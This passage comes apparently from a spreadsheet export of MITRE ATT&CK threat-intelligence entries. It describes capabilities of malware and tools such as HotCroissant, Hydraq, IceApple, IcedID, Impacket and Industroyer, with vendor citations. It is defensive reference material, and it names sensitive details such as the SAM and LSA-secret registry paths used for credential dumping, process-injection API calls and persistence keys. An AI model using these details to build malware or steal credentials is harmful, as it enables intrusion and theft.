    <t>[Hildegard](https://attack.mitre.org/software/S0601) has collected the host's OS, CPU, and memory information.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has started a monero service.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used shell scripts for execution.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has downloaded scripts from GitHub.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list the names of all open windows on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to download files from the infected host to the command and control (C2) server.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to clean up installed files, delete files, and delete itself from the victim’s machine.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of files in a given directory as well as drives and drive types.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to hide the window for operations performed on a given file.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to upload a file from the command and control (C2) server to the victim machine.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can perform dynamic DLL importing and API lookups using &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt; on obfuscated strings.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has encrypted strings with single-byte XOR and base64 encoded RC4.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list running processes on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to do real time screen viewing on an infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to stop services on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can retrieve a list of applications from the &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths&lt;/code&gt; registry key.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has used the open source UPX executable packer.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has compressed network communications and encrypted them with a custom stream cipher.(Citation: Carbon Black HotCroissant April 2020)(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to identify the IP address of the compromised machine.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to collect the username on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of services on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can remotely open applications on the infected host with the &lt;code&gt;ShellExecuteA&lt;/code&gt; command.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can adjust token privileges.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can clear all system event logs.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can read data from files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) connects to a predefined domain on port 443 to exfil gathered information.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can download files and additional malware components.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. [Hydraq](https://attack.mitre.org/software/S0203)'s backdoor also enables remote attackers to modify and delete subkeys.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) uses basic obfuscation in the form of spaghetti code.(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor processes.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) uses svchost.exe to execute a malicious DLL included in a new service group.(Citation: Symantec Hydraq Persistence Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can load and call DLL functions.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) C2 traffic is encrypted using bitwise NOT and XOR operations.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor services.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates new services to establish persistence.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)(Citation: Symantec Hydraq Persistence Jan 2010)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.(Citation: Unit42 Emissary Panda May 2019)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can unpack and decrypt its payload prior to execution.(Citation: Trend Micro DRBControl February 2020)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to delete a specified file.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to download additional files.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to run an application (&lt;code&gt;CreateProcessW&lt;/code&gt;) or script/file (&lt;code&gt;ShellExecuteW&lt;/code&gt;) via API.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can be delivered encrypted to a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can run shellcode it injects into a newly created process.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to take screenshots.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to start and stop a specified service.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to pack its payload.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can list all services and their configurations.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has used HTTPS for C2 communications.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can use default credentials to connect to IPC$ shares on remote machines.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can connect to the IPC$ share on remote machines.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can enumerate all account names on a remote share.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can add the name of its communication pipe to &lt;code&gt;HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes&lt;/code&gt;.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can use Windows API's &lt;code&gt;ConnectNamedPipe&lt;/code&gt; and &lt;code&gt;WNetAddConnection2&lt;/code&gt; to detect incoming connections and connect to remote shares.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) uses the &lt;code&gt;certutil&lt;/code&gt; command to decode a payload file.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) creates scheduled tasks to establish persistence.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can encrypt and compress files using Gzip prior to exfiltration.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can harvest credentials from local and remote host registries.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can collect files, passwords, and other data from a compromised host.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can use a Base64-encoded AES key to decrypt tasking.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) Active Directory Querier module  can perform authenticated requests against an Active Directory server.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[IceApple](https://attack.mitre.org/software/S1022)'s Multi File Exfiltrator module can exfiltrate multiple files from a compromised host as an HTTP response over C2.(Citation: CrowdStrike IceApple May 2022) </t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can delete files and directories from targeted systems.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) Directory Lister module can list information about files and directories including creation time, last write time, name, and size.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022)'s Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\SECURITY\Policy\PolEKList\default`, `HKLM\SECURITY\Policy\Secrets\*\CurrVal`, and `HKLM\SECURITY\Policy\Secrets\*\OldVal`.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) .NET assemblies have used `App_Web_` in their file names to appear legitimate.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can use Base64 and "junk" JavaScript code to obfuscate information.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022)'s Credential Dumper module can dump encrypted password hashes from SAM registry keys, including `HKLM\SAM\SAM\Domains\Account\F` and `HKLM\SAM\SAM\Domains\Account\Users\*\V`.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) Result Retriever module can AES encrypt C2 responses.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) Server Variable Dumper module iterates over all server variables present for the current request and returns them to the adversary.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) [ifconfig](https://attack.mitre.org/software/S0101) module can iterate over all network interfaces on the host and retrieve the name, description, MAC address, DNS suffix, DNS servers, gateways, IPv4 addresses, and subnet masks.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>The [IceApple](https://attack.mitre.org/software/S1022) OWA credential logger can monitor for OWA authentication requests and log the credentials.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) can use HTTP GET to request and pull information from C2.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used SSL and TLS in communications with C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used &lt;code&gt;ZwQueueApcThread&lt;/code&gt; to inject itself into remote processes.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials.  [IcedID](https://attack.mitre.org/software/S0483) can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) can query LDAP to identify additional users on the network to infect.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to download additional modules and a configuration file from C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has been executed through Word documents with malicious embedded macros.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application. (Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has called &lt;code&gt;ZwWriteVirtualMemory&lt;/code&gt;, &lt;code&gt;ZwProtectVirtualMemory&lt;/code&gt;, &lt;code&gt;ZwQueueApcThread&lt;/code&gt;, and &lt;code&gt;NtResumeThread&lt;/code&gt; to inject itself into a remote process.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has utilzed encrypted binaries and base64 encoded strings.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify Workgroup membership.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has established persistence by creating a Registry run key.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has created a scheduled task that executes every hour to establish persistence.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has packed and encrypted its loader module.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has been delivered via phishing e-mails with malicious attachments.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has embedded binaries within RC4 encrypted .png files.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify the computer name and OS version on a compromised host.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used obfuscated VBA string expressions.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used HTTPS in communications with C2.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used WMI to execute binaries.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote microphone monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a PasswordRecoveryPacket module for recovering browser passwords.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has decoded malware components that are then dropped to the system.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Imminent Monitor](https://attack.mitre.org/software/S0434) has a feature to disable Windows Task Manager.(Citation: Imminent Unit42 Dec2019)	</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has uploaded a file containing debugger logs, network information and system information to the C2.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has deleted files related to its dynamic debugger feature.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to set the file attribute to hidden.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a keylogging module.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has leveraged CreateProcessW() call to execute the debugger.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a "Process Watcher" feature to monitor processes in case the client ever crashes or gets closed.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a module for performing remote desktop access.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has the capability to run a cryptocurrency miner on the victim machine.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote webcam monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) modules like GetUserSPNs can be used to get Service Principal Names (SPNs) for user accounts. The output is formatted to be compatible with cracking tools like John the Ripper and Hashcat.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) modules like ntlmrelayx and smbrelayx can be used in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040) and [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001) to gather NetNTLM credentials for [Brute Force](https://attack.mitre.org/techniques/T1110) or relay attacks that can gain code execution.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information from NTDS.dit.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) can be used to sniff network traffic via an interface or raw socket.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) contains various modules emulating other service execution tools such as [PsExec](https://attack.mitre.org/software/S0029).(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357)'s wmiexec module can be used to execute commands through WMI.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s data wiper module clears registry keys and overwrites both ICS configuration and Windows files.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) decrypts code to connect to a remote C2 server.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s data wiper component enumerates specific files on all the Windows drives.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) downloads a shellcode payload from a remote C2 server and loads it into memory.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) used [Tor](https://attack.mitre.org/software/S0183) nodes for C2.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) uses a custom port scanner to map out a network.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) uses heavily obfuscated code in its Windows Notepad backdoor.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) has a data wiper component that enumerates keys in the Registry &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) can enumerate remote computers in the compromised network.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s data wiper module writes zeros into the registry keys in &lt;code&gt;SYSTEM\CurrentControlSet\Services&lt;/code&gt; to render a system inoperable.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) collects the victim machine’s Windows GUID.(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s 61850 payload component enumerates connected network adapters and their corresponding IP addresses.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) can use supplied user credentials to execute processes and stop services.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604)’s main backdoor connected to a remote C2 server using HTTPS.(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t xml:space="preserve">[Industroyer](https://attack.mitre.org/software/S0604) can use an arbitrary system service to load at system boot for persistence and replaces the ImagePath registry value of a Windows service with a new backdoor binary.(Citation: Dragos Crashoverride 2017) </t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) has a command to delete files.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) enumerates directories and obtains file attributes on a system.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by adding a new service named OfficeUpdateService.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) uses the API call ShellExecuteW for execution.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>Some [InnaputRAT](https://attack.mitre.org/software/S0259) variants establish persistence by modifying the Registry key &lt;code&gt;HKU\&lt;SID&gt;\Software\Microsoft\Windows\CurrentVersion\Run:%appdata%\NeutralApp\NeutralApp.exe&lt;/code&gt;.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) gathers volume drive information and system information.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) launches a shell to execute commands on the victim’s machine.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>Some [InnaputRAT](https://attack.mitre.org/software/S0259) variants create a new Windows service to establish persistence.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
